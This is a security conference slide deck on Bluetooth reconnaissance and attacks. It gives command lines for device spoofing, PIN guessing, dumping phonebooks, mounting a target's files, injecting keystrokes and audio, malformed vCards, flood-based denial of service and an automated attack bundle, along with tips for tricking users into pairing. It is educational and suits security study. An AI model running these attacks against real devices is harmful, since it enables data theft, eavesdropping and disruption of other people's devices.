Bluetooth
● IEEE 802.15.1
● Released 1999
● Version 1.0 first release
● Standards controlled by Bluetooth SIG
● Low Power / Low Data Rate / Short Range
● Ideal for use in place of USB, PS/2, Serial, Audio Cables, etc
● Included in Billions of Devices
● Many of them portable or embedded
Bluetooth Versions
Version  Release  Updated Features
1.0      1999     Initial release
1.1      2001     Unencrypted options
1.2      2003     FHSS, Rate 721 Kbs
2.0      2004     Rate 2.1 Mbs
2.1      2007     Improved Security
3.0      2009     AMP adds 24 Mbs rate, 802.11 transport
4.0      2010     Low Power, Redefining Protocols
Topology
● Star network topology
● Ad-Hoc (Piconet)
● Master / Slave
● Master controls the network
  – Sets things like clock cycles
● Master can have up to 7 slave devices
● Slave can only have one Master
● Either device can initiate pairing
Security
● Authentication
  – Initial pairing with a PassKey
  – Further authentication with Link Key
● Encryption
  – Traffic encrypted during transit
● Authorization
  – Varying levels of Trust
Linux Bluetooth Basics
● BlueZ Bluetooth Stack
  – Recommend compiling from source with flags to install additional services
● Some of the Tools
  – hciconfig - Configure interface settings
  – hcitool - Configure connections
  – bluetoothd - Bluetooth Daemon
  – sdptool - Service discovery
  – simple-agent - Pairing
Equipment
● Adapter
  – Parani UD100
● Antenna
  – Use the same antenna equipment as Wi-Fi
● Chipset
  – Cambridge Silicon Radio (CSR)
● Version
  – Version 2.1 (3.0 and 4.0 starting to come out)
Scanning
● Scan for devices in Discoverable Mode
● Device listens for remote Inquiries
● Device not listening will not respond to scans
# hcitool -i hci0 scan --flush --class
BD Address: E0:F8:47:4D:5E:6F [mode 1, clkoffset 0x5585]
Device name: Bob's Laptop [cached]
Device class: Computer, Laptop (0x3a010c)
Access Profile
● Device Address: unique identifier
  – Example: 00:11:22:33:44:55
● Class of Device (CoD): 24-bit value
  – Services: Identifies types of services
  – Major Device Class: High level type of device
  – Minor Device Class: More granular
● Device Name: Human readable identifier
  – Example: "Motorola Headset"
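As an added example (not part of the original deck), the Python below decodes the two machine-readable Access Profile fields of a scanned device the way a scan parser or asset inventory would: the BD_ADDR split into its NAP, UAP and LAP parts, and the 24-bit Class of Device split into service, major and minor classes per the Bluetooth SIG assigned-numbers tables (only the Computer minor classes are listed). The function names are my own; the value 0x3a010c from the hcitool output above decodes to Computer, Laptop.

```python
# Added example, not from the original slides: decode the two
# machine-readable Access Profile fields of a scanned device.
# Class names follow the Bluetooth SIG assigned-numbers tables;
# only the Computer minor classes are listed, to keep it short.

MAJOR_CLASSES = {
    0: "Miscellaneous", 1: "Computer", 2: "Phone",
    3: "LAN/Network Access Point", 4: "Audio/Video", 5: "Peripheral",
    6: "Imaging", 7: "Wearable", 8: "Toy", 9: "Health", 31: "Uncategorized",
}
COMPUTER_MINOR = {  # minor classes valid only when major == Computer
    0: "Uncategorized", 1: "Desktop workstation", 2: "Server", 3: "Laptop",
    4: "Handheld PC/PDA", 5: "Palm-size PC/PDA", 6: "Wearable computer",
    7: "Tablet",
}
SERVICE_BITS = {  # major service class bits; bits 14 and 15 are reserved
    13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer", 21: "Audio",
    22: "Telephony", 23: "Information",
}


def split_bdaddr(addr):
    """Split a BD_ADDR string into NAP (16 bit), UAP (8 bit) and LAP (24 bit)."""
    octets = [int(x, 16) for x in addr.split(":")]
    if len(octets) != 6 or not all(0 <= o <= 0xFF for o in octets):
        raise ValueError("expected six hex octets, got %r" % addr)
    return {
        "nap": (octets[0] << 8) | octets[1],
        "uap": octets[2],
        "lap": (octets[3] << 16) | (octets[4] << 8) | octets[5],
    }


def decode_cod(cod):
    """Decode a 24-bit Class of Device into service, major and minor classes."""
    if cod < 0 or cod > 0xFFFFFF or cod & 0x3:  # low two bits: format type, must be 00
        raise ValueError("not a format-type 00, 24-bit CoD: 0x%x" % cod)
    major_num = (cod >> 8) & 0x1F
    minor_num = (cod >> 2) & 0x3F
    major = MAJOR_CLASSES.get(major_num, "Reserved (%d)" % major_num)
    if major_num == 1:
        minor = COMPUTER_MINOR.get(minor_num, "Reserved (%d)" % minor_num)
    else:
        minor = "minor class %d" % minor_num  # other minor tables omitted
    services = [name for bit, name in SERVICE_BITS.items() if cod & (1 << bit)]
    return {"major": major, "minor": minor, "services": services}
```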
Spoofing
● Bluetooth Profile:
  – Device Address, Device Class, Device Name
● Bluetooth Profile Cloning:
  – Modify host Bluetooth Adapter profile to match the profile of another device
● Bluetooth Profile Spoofing:
  – Creating a misleading profile of host Bluetooth Adapter
SpoofTooph
● Scan local area for devices
● Save list of devices found
● Select a device from the list to clone
# spooftooph -i hci0 -s -w scan.log
War-Nibbling
BT Device 1: BDADDR 00:05:4F:00:00:00
Class : 0x30040
Name : StreetPilot c550
Seen : 1
Manuf : Private
First : Thu May 10 16:07:50 2012
Last : Thu May 10 16:07:50 2012
Min Pos : Lat 35.997002 Lon 78.909752 Alt 129.585999 Spd 0.000000
Max Pos : Lat 35.997002 Lon 78.909752 Alt 129.585999 Spd 0.000000
Avg Pos : AvgLat 35.997002 AvgLon 78.909752 AvgAlt 129.585900
Service Discovery
● Service Discovery Protocol (SDP)
  – Lists available services on device
  – Service name
  – L2CAP "port"
  – RFCOMM "port"
● Generally available without authentication
Service Discovery
# sdptool -i hci0 browse xx:xx:xx:xx:xx:xx
...
Service Name: File Transfer server
Service RecHandle: 0x10000
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 10
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX File Transfer" (0x1106)
    Version: 0x0100
Port Scan
● Find open ports with listening services
● Similar to NMAP
● psm_scan
  – Scan open L2CAP "ports"
# psm_scan -i hci0 -s 1 -e 101 xx:xx:xx:xx:xx:xx
● rfcomm_scan
  – Scan open RFCOMM "ports"
# rfcomm_scan -i hci0 -s 1 -e 30 xx:xx:xx:xx:xx:xx
CavitySearch
● *Tool Release*
● Streamline the info gathering process
● Conduct recon for HCI Info, SDP, L2CAP, and RFCOMM
● Aggregate into a single log file
CavitySearch
# cavitysearch hci0 11:22:33:44:55:66
Gathering device info into 11_22_33_44_55_66/hciinfo.log ...
Gathering device scan into 11_22_33_44_55_66/scan.log ...
Gathering SDP into 11_22_33_44_55_66/sdp.log ...
Gathering PSMs 1 101 into 11_22_33_44_55_66/psm.log ...
Gathering RFCOMMs 1 30 into 11_22_33_44_55_66/rfcomm.log ...
Generating profile in 11_22_33_44_55_66/profile.log ...
Logs saved in 11_22_33_44_55_66/ directory.
...done.
Bluetooth Identity
Bluetooth Class
● Type of Device
  – Assist in determining physical device
● List Services
  – Networking, Telephony, & Object Transfer
Bluetooth Name
● Use human name for Social Engineering
● Use model name to determine possible attack vectors
Bluetooth Address
● Devices are assigned addresses in blocks
● The same models are within a limited range
Bluetooth Profiling Project
● Bluetooth Profiling Project (BlueProPro)
● Collect Device Name, Device Address and Device Class on as many devices as possible
● Same idea as Josh Wright's Bnap,Bnap, but collecting device profiles from other devices instead
● Collected over 1,500 device profiles so far
● 1,000 profiles posted as of 07/29/2010
Bluetooth Profiling Project
Percentage of device names which disclosed sensitive information (out of the 1,500 profiles collected)
First Name          28.17%
Last Name           18.76%
Location             1.30%
Device Model        70.54%
Nickname / Handle    1.51%
Sniffing
● HCIDump
  – Similar to TCPDump to capture traffic on host
# hcidump -i hci0 -R -w btdump.cap
● Wireshark
  – View and examine capture
# wireshark -r btdump.cap
Ubertooth
● Kismet
  – Capture portions of Bluetooth traffic
  – Find Bluetooth devices in local area
● Bluetooth_RXTX
  – Find Bluetooth devices in local area
  – Brute force UAP portion of Device Address
● Specan
  – Spectrum analysis
Find Non-Discoverable
● Previous Contact
  – Have prior knowledge of the Device Address
● Labels
  – Some devices print the Device Address on the box or casing
● Redfang
  – Scans 2^48 (2^32) possible Device Addresses
  – Takes years
Find Non-Discoverable
● Only need LAP and UAP portions of the device address
● Ubertooth-lap extracts the LAP
# ubertooth-lap
● Ubertooth-uap calculates the UAP
# ubertooth-uap
Pairing
● Guess PassKey
● Commonly PassKeys are 4 digits
  – Best chances: 0000, 1234, 9999
# simple-agent hci0 xx:xx:xx:xx:xx:xx
RequestPinCode (/org/bluez/2/hci0/dev_xx_xx_xx_xx_xx_xx)
Enter PIN Code:
Pairing
● Trick User by changing the profile to one the user recognizes
● Post signs requesting connections as advertising or local information
Pairing
● Chomp
  – Bluetooth specification attempts to counteract brute force
  – Attempts different PassKeys
  – Changes Device Address between attempts
  – Provide a file with possible PassKeys
# chomp xx:xx:xx:xx:xx:xx passkeys
Common Services
● File Transfer Profile (FTP)
● Object Push Profile (OPP)
● Human Interface Device (HID)
● Hands Free (HF)
● Personal Area Network (PAN)
OPP
● Specific files like phonebooks and calendars
● Bluebugger
  – dump phonebook
# bluebugger -c 3 -a xx:xx:xx:xx:xx:xx phonebook
● Specific tools
  – Bluesnarfer, btxml, btobex, bloover, helomoto
FTP
● FTP facilitates exchanging files
● Obexfs mounts a remote folder over FTP
● Interact as if the files were stored locally
# mkdir btdir
# obexfs -b xx:xx:xx:xx:xx:xx -c 3 btdir/
# ls btdir
Passwords.xls Taxes.pdf
HID
● HID is used for various types of human interface devices such as mice and keyboards.
● Inject keystrokes by acting as a keyboard
● Stuffkeys
  – Keystrokes hard coded
  – Default "who controls your keystrokes?"
# stuffkeys -a xx:xx:xx:xx:xx:xx -b yy:yy:yy:yy:yy:yy
HF
● Inject and receive audio
● Carwhisperer
# hciconfig hci0 voice 0x0060
# carwhisperer -i hci0 in.raw out.raw 4
● HSTest
# hstest record in.raw xx:xx:xx:xx:xx:xx 4
PAN
● Creates a TCP/IP network over Bluetooth
● Interact as if it were WiFi or Ethernet
# pand --connect xx:xx:xx:xx:xx:xx --persist --encrypt --role=PANU
# ifconfig
...
pan0 Link encap:Ethernet HWaddr yy:yy:yy:yy:yy:yy
...
Fuzzing
● Bluetooth Stack Smasher
  – Fuzz L2CAP packets
  – Attempts to crash Bluetooth Stack
  – Generates code for suspected crashes
  – Takes about half an hour to run
# bss -i hci0 -s 100 -m 12 -M 0 xx:xx:xx:xx:xx:xx
vCards
● Virtual Business Card
  – Adds information to contacts
● BlueJacking
  – Sending messages by vCard
  – Set the name field to the message
● Nasty vCard
  – Send a malformed vCard
# ussp-push xx:xx:xx:xx:xx:xx nasty.vcf bob.vcf
DoS
● L2Ping Flood
  – Send a constant flood of ping packets
# l2ping -i hci0 -f xx:xx:xx:xx:xx:xx
● vCard Flood
  – Fill up address book with contacts
# vcblaster -c 100 -g xx:xx:xx:xx:xx:xx
PwnTooth
● Bundle of Bluetooth attack tools
● Designed to automate multiple attacks against multiple targets.
● If a device address is detected in multiple iterations of scans, the attacks listed in the config file are only run the first time
# pwntooth -l logfile.txt -s 10
Recap
● Setup
  – Configure interface
● Recon
  – Gather information on device and services
● Connect
  – Authenticate or connect to open services
● Interact
  – Access resources
● Attack
  – Test reliability through fuzzing and DoS
Q&A
JP Dunning
Twitter: r0wnin
Email: ronin <At> shadowcave <d0t> org
Web: www.hackfromacave.com